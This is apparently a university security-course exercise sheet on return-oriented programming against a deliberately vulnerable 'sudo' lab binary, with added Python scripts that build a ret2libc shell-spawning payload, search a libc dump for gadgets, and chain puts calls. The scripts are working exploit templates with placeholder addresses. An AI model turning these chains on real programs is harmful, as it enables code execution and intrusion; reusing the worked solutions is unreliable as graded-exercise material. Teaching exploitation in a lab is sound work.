Introduction to Information Security. Exercise 5

Exercise 5

Download exercise 5 from our website (https://course.cs.tau.ac.il/infosec16/exercises) and run ex_unpack on the exercise file and a target directory; the exercise should be extracted into that directory with the sudo binary, its source sudo.c, assemble.py, and the pack.py script. For every question, also submit a .txt file that documents your work and describes your thought process in your own words!

Questions

1. The sudo is similar to the one from exercise 3, except that it doesn't actually run a command (it just prints "Victory!" if you get the password check to pass), its check_password function is slightly different, and its stack is no longer executable. Use the stack overflow together with return-oriented programming (ROP) to make the sudo run a shell. To do that you'll have to find the addresses of the standard C library function system and of the string "/bin/sh" (which, surprisingly, is also in libc). Since the C library is linked dynamically, GDB is a better tool than IDA here: run the program, break somewhere, and look for the addresses. Finding system is as easy as printing it (p system); finding "/bin/sh" can be done with the find command, which accepts a range and a string and looks for that string in that range (for example, find 0x8048100, 0x8048200, "foo").

You'll notice that once you exit the shell, the sudo resumes and crashes. Find the exit function and build your ROP chain so that after the shell exits, the sudo exits cleanly with exit status 0x42 (you can see a program's exit status by running echo $? immediately after it exits).

Write a Python script q1.py that uses the vulnerable sudo to open a shell and then exits cleanly with exit status 0x42, and describe your solution in q1.txt.
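The stack layout question 1 asks for, as an added example (this is not the exercise's own code and not a solution to the real sudo). Every address and the padding length are assumptions: the real ones come from GDB (p system, p exit, the find command) and from the buffer size in sudo.c. The example also assumes the sudo reads the password from stdin; if it takes it as argv[1], pass the bytes that way instead.

```python
import struct
import sys

# Assumed values for illustration only. Take the real ones from GDB
# (`p system`, `p exit`, `find <start>, <end>, "/bin/sh"`) and the real
# padding length from the overflow you found in exercise 3.
SYSTEM_ADDR = 0xf7e4b1c0   # assumed output of `p system`
EXIT_ADDR = 0xf7e3e9b0     # assumed output of `p exit`
BINSH_ADDR = 0xf7f6b2d3    # assumed output of `find ..., "/bin/sh"`
PADDING_LEN = 76           # assumed distance from the buffer to the saved return address


def p32(value):
    """Pack one 32-bit little-endian DWORD, i.e. one slot on the x86 stack."""
    return struct.pack("<I", value)


def build_ret2libc_chain(system, exit_, binsh, padding_len, status=0x42):
    """Return the overflow payload: padding, then the fake stack frames.

    When the overflowed function executes `ret`, the CPU pops slot 0 and jumps to
    system(). system() then sees slot 1 as its return address and slot 2 as its
    first argument. When the shell exits, system() returns into exit(), which sees
    slot 2 as its (never used) return address and slot 3 as its argument.
    """
    payload = b"A" * padding_len
    payload += p32(system)   # slot 0: overwritten return address -> system()
    payload += p32(exit_)    # slot 1: system()'s return address -> exit()
    payload += p32(binsh)    # slot 2: system()'s argument: pointer to "/bin/sh"
    payload += p32(status)   # slot 3: exit()'s argument; `echo $?` prints 66 (0x42)
    return payload


def describe_chain(payload, padding_len):
    """Decode the chain into (role, value) pairs for the write-up in q1.txt."""
    roles = (
        "ret -> system",
        "system() returns into -> exit",
        "arg1 of system(): &\"/bin/sh\"",
        "arg1 of exit(): status",
    )
    slots = payload[padding_len:]
    values = struct.unpack("<%dI" % (len(slots) // 4), slots)
    return list(zip(roles, values))


if __name__ == "__main__":
    chain = build_ret2libc_chain(SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR, PADDING_LEN)
    for role, value in describe_chain(chain, PADDING_LEN):
        sys.stderr.write("%-34s 0x%08x\n" % (role, value))
    # Raw bytes on stdout so the payload can be piped into the target,
    # e.g. `python3 q1.py | ./sudo` (assumption: sudo reads the password from stdin).
    sys.stdout.buffer.write(chain)
```

The order of the last two slots is the part people get wrong: system() is entered by a ret, not a call, so the slot right after its address is its return address and the argument comes one slot later. The same rule then applies to exit(), which is why 0x42 sits last.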

2. This time we'll write some actual code using ROP: we'll change the global auth variable to make the sudo print "Victory!". To do that, open GDB and run info files to see what's mapped where. Find libc's text segment and use the dump binary memory command, which accepts a filename and a range and copies the memory in that range to that file (for example, dump binary memory libc.bin 0x8048100 0x8048200). We do this so we can look for gadgets: short snippets of code that do what we want and then RET. This may sound complicated, but it's as simple as writing the gadget, running our beloved assemble.py to translate it to machine code, and using Python to find those bytes in the libc text dump.

Write a Python script q2.py that makes the vulnerable sudo print "Victory!" by changing the global auth variable (it may then crash), and describe your solution in q2.txt.
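The gadget search and the write-what-where chain for question 2, as an added example (not the exercise's own code). The libc dump is a constructed stand-in: a buffer of NOPs with three hand-assembled gadgets placed at known offsets, so it runs offline; in the real q2.py you would read libc.bin instead. LIBC_TEXT_BASE, AUTH_ADDR and PADDING_LEN are assumptions (from info files, p &auth, and the exercise 3 overflow). The gadget encodings are the bytes assemble.py would emit for those instructions. The example also filters out gadget addresses that contain a zero byte, which question 3 states as a requirement, and checks the chain with a tiny simulator before anything is sent to the target.

```python
import struct

# Hand-assembled gadget encodings (what assemble.py produces for each line).
POP_EDI_RET = b"\x5f\xc3"          # pop edi ; ret
POP_ESI_RET = b"\x5e\xc3"          # pop esi ; ret
MOV_EDI_ESI_RET = b"\x89\x37\xc3"  # mov [edi], esi ; ret

# Assumptions for illustration: the real values come from GDB (`info files` for the
# libc .text range, `p &auth` for the global) and from the exercise 3 overflow.
LIBC_TEXT_BASE = 0xf7e10000  # start address passed to `dump binary memory libc.bin ...`
AUTH_ADDR = 0x0804a02c       # address of the global `auth` variable
PADDING_LEN = 76             # bytes from the buffer to the saved return address


def make_fake_libc():
    """Constructed stand-in for libc.bin: NOP filler with gadgets at known offsets."""
    libc = bytearray(b"\x90" * 0x3000)
    libc[0x0100:0x0102] = POP_EDI_RET      # 0xf7e10100: right code, unusable address (0x00 byte)
    libc[0x1234:0x1236] = POP_EDI_RET      # 0xf7e11234: the copy we want
    libc[0x2345:0x2347] = POP_ESI_RET      # 0xf7e12345
    libc[0x1a2b:0x1a2e] = MOV_EDI_ESI_RET  # 0xf7e11a2b
    return bytes(libc)


def find_gadgets(libc_bytes, base, code):
    """Every address in the dump where `code` occurs, lowest first."""
    hits, pos = [], libc_bytes.find(code)
    while pos != -1:
        hits.append(base + pos)
        pos = libc_bytes.find(code, pos + 1)
    return hits


def has_null_byte(addr):
    return b"\x00" in struct.pack("<I", addr)


def pick_gadget(libc_bytes, base, code):
    """First occurrence whose address has no zero byte (a zero byte would cut the chain)."""
    for addr in find_gadgets(libc_bytes, base, code):
        if not has_null_byte(addr):
            return addr
    raise LookupError("no null-free copy of %r in dump" % code)


def p32(value):
    return struct.pack("<I", value)


def build_write_chain(pop_edi, pop_esi, mov_edi_esi, target, value, padding_len):
    """Padding, then: edi = target ; esi = value ; [edi] = esi. Each gadget's ret pops the next slot."""
    chain = b"A" * padding_len
    chain += p32(pop_edi) + p32(target)   # pop edi ; ret        -> edi = &auth
    chain += p32(pop_esi) + p32(value)    # pop esi ; ret        -> esi = value to store
    chain += p32(mov_edi_esi)             # mov [edi], esi ; ret -> auth = value; the last ret may crash
    return chain


def simulate(chain, padding_len, semantics):
    """Walk the chain the way the CPU would: each ret pops the next slot and runs that gadget."""
    slots = [struct.unpack("<I", chain[i:i + 4])[0] for i in range(padding_len, len(chain), 4)]
    regs, mem = {}, {}
    while slots:
        semantics[slots.pop(0)](regs, mem, slots)
    return regs, mem


def pop_into(reg):
    return lambda regs, mem, slots: regs.__setitem__(reg, slots.pop(0))


def store_esi_at_edi(regs, mem, slots):
    mem[regs["edi"]] = regs["esi"]


def solve(libc_bytes, base, target, value, padding_len):
    """Find the three gadgets, build the chain, and return (chain, gadget addresses, simulated memory)."""
    codes = (POP_EDI_RET, POP_ESI_RET, MOV_EDI_ESI_RET)
    gadgets = {code: pick_gadget(libc_bytes, base, code) for code in codes}
    chain = build_write_chain(gadgets[POP_EDI_RET], gadgets[POP_ESI_RET],
                              gadgets[MOV_EDI_ESI_RET], target, value, padding_len)
    semantics = {gadgets[POP_EDI_RET]: pop_into("edi"),
                 gadgets[POP_ESI_RET]: pop_into("esi"),
                 gadgets[MOV_EDI_ESI_RET]: store_esi_at_edi}
    regs, mem = simulate(chain, padding_len, semantics)
    return chain, gadgets, mem


if __name__ == "__main__":
    libc = make_fake_libc()   # in the real q2.py: libc = open("libc.bin", "rb").read()
    chain, gadgets, mem = solve(libc, LIBC_TEXT_BASE, AUTH_ADDR, 1, PADDING_LEN)
    for code, addr in gadgets.items():
        print("%-8s at 0x%08x" % (code.hex(), addr))
    print("simulated auth = %d" % mem[AUTH_ADDR])
```

Note that find_gadgets reports the decoy at 0xf7e10100 first; the null-byte filter is what makes pick_gadget skip it. The simulator only knows the three gadgets it is given, so a typo in the chain (a wrong address, slots in the wrong order) shows up as a KeyError here rather than as a silent crash of the sudo.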

Here are some screenshots of what solving question 2 looks like, to help you get started.

3. Create a ROP shellcode that loops infinitely and prints the string "Hello, World! \n" together with your student id, i.e. the ROP equivalent of:

while (1) {
    int ch = 0;
    printf("Hello, World! %d\n", STUDENT_ID);
}

To document your gadgets, create a q3_1_gadgets.csv (csv = Comma Separated Values). Example (fake) file content:

question, main opcode, address_in_libc, what_does_it_do
3.1.9, POP EDI, 0x7F4E5056, "MOV EDI, CONSTANT"
3.1.10, POP ESI, 0x7F4E5058, "MOV [EDI], CONSTANT"
3.1.10, MOV [EDI], ESI, 0x7F4E5159, "MOV [EDI], CONSTANT"

To print this string, follow the steps below:

3.1. Find a gadget (or a combination of gadgets) for each of the following. Remember: gadget addresses cannot contain a zero byte.
  3.1.1. MOV EBP from a constant [1pt]
  3.1.2. MOV ESP's content to one of the registers EAX, EBX, ECX or EDX [2pts]
  3.1.3. ADD a constant to one of the registers [2pts]
  3.1.4. MOV a register to [register+SOME_CONSTANT] [2pts]
3.2. Find the address of puts (within libc) [1pt]
3.3. Add the "Hello, World!" string at the end of your shellcode.
  3.3.1. Why at the end? [1pt]
3.4. Build the ROP shellcode so that it does the following [15pts]. This assumes the stack is at the same address between runs.
  3.4.1. Put a pointer to puts in EBP
  3.4.2. Jump to puts
  3.4.3. Skip the next 8 bytes (HINT: use a double POP)
  3.4.4. Add 4 bytes with the pointer to the string, followed by your student id DWORD. If your student id DWORD contains a 0 byte, change that byte to 0x2e for simplicity. E.g. student id 316049152 would appear in memory as 0x12D6872E (instead of 0x12D68700) and will be printed as 316049198.
  3.4.5. Loop back to 3.4.1

FILES REQUIRED: q3_1_gadgets.csv; q3.txt (thoughts and docs); q3_4.py (same as q2.py but with the new ROP chain); student_id.txt (contains your student id).

4. Bonus [25pts]: print, but wait for user input before exiting:

while (1) {
    int ch = 0;
    puts("Hello, World! %d\n", STUDENT_ID);
    ch = getchar();
    if (ch == 'q')
        exit(123);
}

To implement this code you'll first need to find the addresses of exit, getchar and puts. You'll also need the conditional jumps described in class. FILES REQUIRED: q4.py (same as q2.py but with the relevant ROP chain); q4.txt (thoughts and docs).
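A building block for question 3, as an added example that is not the exercise's own code: one pass through steps 3.2 to 3.4.4 in Python. It returns straight into puts instead of loading puts into EBP first (3.4.1 and 3.4.2), and it leaves out the loop of 3.4.5, so after puts returns into the double-POP gadget the final ret lands in the string bytes and the program crashes after printing once. PUTS_ADDR, POP_POP_RET, PADDING_LEN and PAYLOAD_ADDR (the stack address where the payload starts, which the exercise assumes is constant between runs) are assumptions; the real values come from GDB and from the gadget search of question 2. The reasoning that the string goes last because its terminating zero byte ends the copied input is this example's assumption, not the page's answer to 3.3.1.

```python
import struct
import sys

# Assumptions for illustration; the real values come from GDB and from q2's gadget search.
PUTS_ADDR = 0xf7e62b40       # `p puts`
POP_POP_RET = 0xf7e1d7a1     # any `pop X ; pop Y ; ret` gadget found as in q2
PAYLOAD_ADDR = 0xffffd2c4    # address of the first payload byte on the stack (constant between runs)
PADDING_LEN = 76             # bytes from the buffer to the saved return address
MESSAGE = b"Hello, World!\n"


def p32(value):
    return struct.pack("<I", value)


def encode_student_id(student_id):
    """Student id as a little-endian DWORD with every 0x00 byte replaced by 0x2e (step 3.4.4).

    316049152 = 0x12D68700 has a zero low byte, so it becomes 0x12D6872E = 316049198.
    """
    raw = p32(student_id)
    fixed = raw.replace(b"\x00", b"\x2e")
    return struct.unpack("<I", fixed)[0]


def first_null(data):
    """Offset of the first zero byte in the chain proper, or -1 if there is none."""
    return data.find(b"\x00")


def build_puts_chain(puts, pop_pop_ret, payload_addr, padding_len, student_id, message=MESSAGE):
    """One iteration of 3.4.2-3.4.4 without the loop of 3.4.5.

    Slots after the padding: [puts][pop_pop_ret][&message][student id]
    ret -> puts(&message); puts returns into pop;pop;ret, which discards &message and
    the id (the 8 bytes the hint says to skip) and then returns into whatever follows.
    Here that is the message itself, so the program prints once and crashes.
    Returns (payload, address of the message) for the write-up in q3.txt.
    """
    slots = 4 * 4
    message_addr = payload_addr + padding_len + slots   # the string sits right after the slots
    chain = b"A" * padding_len
    chain += p32(puts)                           # 3.4.2: ret -> puts
    chain += p32(pop_pop_ret)                    # 3.4.3: puts returns here, skipping the next 8 bytes
    chain += p32(message_addr)                   # puts' argument: pointer to the string below
    chain += p32(encode_student_id(student_id))  # 3.4.4: discarded by the second pop
    null = first_null(chain[padding_len:])
    if null != -1:
        raise ValueError("zero byte at chain offset %d" % (padding_len + null))
    # 3.3: the string goes last; its terminator is the only zero byte in the payload
    # (assumption: the input copy stops at the first zero byte).
    return chain + message + b"\x00", message_addr


if __name__ == "__main__":
    student_id = 316049152  # the page's example id; read yours from student_id.txt
    payload, message_addr = build_puts_chain(PUTS_ADDR, POP_POP_RET, PAYLOAD_ADDR,
                                             PADDING_LEN, student_id)
    sys.stderr.write("string expected at 0x%08x, id DWORD 0x%08x\n"
                     % (message_addr, encode_student_id(student_id)))
    sys.stdout.buffer.write(payload)   # assumption: the target reads the payload from stdin
```

If the printed string address is wrong, nothing prints and the crash looks the same as a bad chain, so verify PAYLOAD_ADDR in GDB (break in the vulnerable function and print the buffer's address) before blaming the gadgets. Any pointer or id DWORD that happens to contain a zero byte is rejected by first_null rather than silently truncating the chain.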

COPYING OR WORKING IN GROUPS (TWO OR MORE) OR USING REFERENCES WILL RESULT IN IMMEDIATE DISQUALIFICATION FROM THE COURSE! (ESPECIALLY, FOR THE BONUS)

Run ex_pack on the exercise directory and enter your student ID; the directory should be compressed into a zip file, which you are to submit. ex_pack also runs the pack.py script, which makes sure all your files are present and valid.
